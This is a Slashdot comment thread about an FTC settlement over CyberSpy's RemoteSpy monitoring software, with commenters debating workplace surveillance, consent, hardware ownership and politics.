They have this sort of thing in Taiwan, I was working for a company in South Africa that bought the license to sell it. Here it is: Ip-Guard [ip-guard.com] Basically, the software is scarily powerful in what it records and can do.

In south african law it's legal only if the employee is aware of it, so if it's in the employment contract. I think.

The company I was working for charged too much, didn't make enough sales, went tits-up. Classic case of greed before the fall.

Re:Use in the workplace (1)

DaMattster (977781) | more than 4 years ago | (#32475612)

I believe we do have a reasonable expectation of privacy. Kind of shame those that are greedy and in power forget what it is like when the shoe is on the other food.

Ownership has nothing to do with it (0)

grimJester (890090) | more than 4 years ago | (#32475792)

Just examine that "hardware they own" argument a bit. Are you certain it's not just because you think employers can do anything they like to employees? Consider the cases where:

- The employer leases or rents their hardware. No spying allowed?
- The employee uses his own hardware. Can't demand he installs this?
- Someone leases or rents hardware to a company. Can't spy on their customers?
- Someone leases or rents hardware to individuals. Can't spy on them?
- Some company owns mail servers / routers / wires. Can't wiretap?

The "hardware they own" argument is bullshit because it's always applied to employer vs. employee and whether the employer owns the hardware is never relevant.

Re:Ownership has nothing to do with it (1)

masmullin (1479239) | more than 4 years ago | (#32476276)

WTF are you talking about? Of course it's about whether the employer owns the hardware. You can't install stuff on employees private property.

For the record using this software is pretty lame. If an employer wants to monitor employees just tell the employees they are being monitored and use a less obfuscated software system. However, if the employer owns the hardware they can do whatever the fuck they want with it.

Re:Ownership has nothing to do with it (1)

Imrik (148191) | more than 4 years ago | (#32478912)

You can however require that the software be installed on any computer that uses the company network or even on any computer that's in the building.

Re:Ownership has nothing to do with it (1)

masmullin (1479239) | more than 4 years ago | (#32479594)

So don't use private computers at work. Don't connect to the work VPN with private computers. You shouldn't be doing these things anyway.

Employers cannot demand you to utilize private equipment for work tasks.

Re:Ownership has nothing to do with it (0)

Anonymous Coward | more than 4 years ago | (#32476956)

The "hardware they own" argument is bullshit

Quite true. The relevant argument is whether or not the employee was told that their activities would possibly be monitored in this way, for instance in their employee handbook or employment agreement.

Visible spyware? (3, Funny)

assemblerex (1275164) | more than 4 years ago | (#32475204)

How do you market an oxymoron?

Re:Visible spyware? - does it run on linux ;) (1)

Janek Kozicki (722688) | more than 4 years ago | (#32475580)

Dear CyberSpy software

I need to spy my sysadmin, because he is suspected of spying on company's emails. That is why I am sending this email from my hotmail account instead of company's server. I want to purchase your RemoteSpy software.

PS: you asked about his windows version. I just checked that, he is running windows version called "Slackware" I hope this helps.

PSS: I have already paid on your secure website using my credit card,
best regards

Re:Visible spyware? - does it run on linux ;) (0)

Anonymous Coward | more than 4 years ago | (#32475638)

It would actually be PPS since postscriptscript doesn't make sense but postpostscript means it's the postscript after the first postscript.

Just FYI.

Re:Visible spyware? - does it run on linux ;) (1)

DaMattster (977781) | more than 4 years ago | (#32475776)

Yes, it does run on Linux.

Re:Visible spyware? (1)

lostsoulz (1631651) | more than 4 years ago | (#32476032)

How do you market an oxymoron?

Why...ask Bill Gates! I know, it's a cheap shot - 's/Bill Gates/Steve Jobs/g' if you wish.

YOU FAIL IT? (-1, Offtopic)

Anonymous Coward | more than 4 years ago | (#32475210)

departures of Of businees and Good manners themselves to be a handy, you are free 'doing something'

No need to fear... (1)

pongo000 (97357) | more than 4 years ago | (#32476146)

...as I imagine it will only be a matter of time before some inquisitive folks who are up to the challenge figure out how to detect (and possibly disable) this.

I turned down the "opportunity" ... (3, Insightful)

Brett Johnson (649584) | more than 4 years ago | (#32479568)

Back in 2002 or 2003 I was offered a job with these guys [or possibly a similar firm] to port the software to Mac OS X. Once I was informed that the product I would be working on was to be used to spy on a company's employees, I chose to decline. When I started in my career almost 30 years ago, I vowed to myself that I would pursue it with the utmost integrity. This was way over *my* line.

This from the Democrats? (1)

chasisaac (893152) | more than 4 years ago | (#32484528)

Let me see if understand this correctly:

Bush's FTC stopped this horrid piece of software from infecting a persons machine.

Obama's FTC allows allows this spyware into the world.

Can someone remind which party is for 'the little guy'.

Wow am I glad we voted Obama in.

Re:This from the Democrats? (0)

Anonymous Coward | more than 4 years ago | (#32487378)

From my reading of the article, it looks like this company figured out how to comply with the letter (but not the spirit) of the law. There isn't much the FTC or the executive branch can do at that point. Maybe you should be complaining about congress?

Re:This from the Democrats? (0)

Anonymous Coward | more than 4 years ago | (#32487920)

The settlement notice from the FTC is at:

http://www.ftc.gov/opa/2010/06/cyberspy.shtm

Everything seems to be saying that the software was *marketed* illegally, not that there is anything about spy software that violates the law. Time will tell if they bother with anyone else in the industry. I'm guessing CS just walked the line a little too closely, so the FTC singled them out to make an example.

A multi-year case over marketing? These are your tax-dollars at work America. I shudder to think what this has cost us.

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?
or Connect with...

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>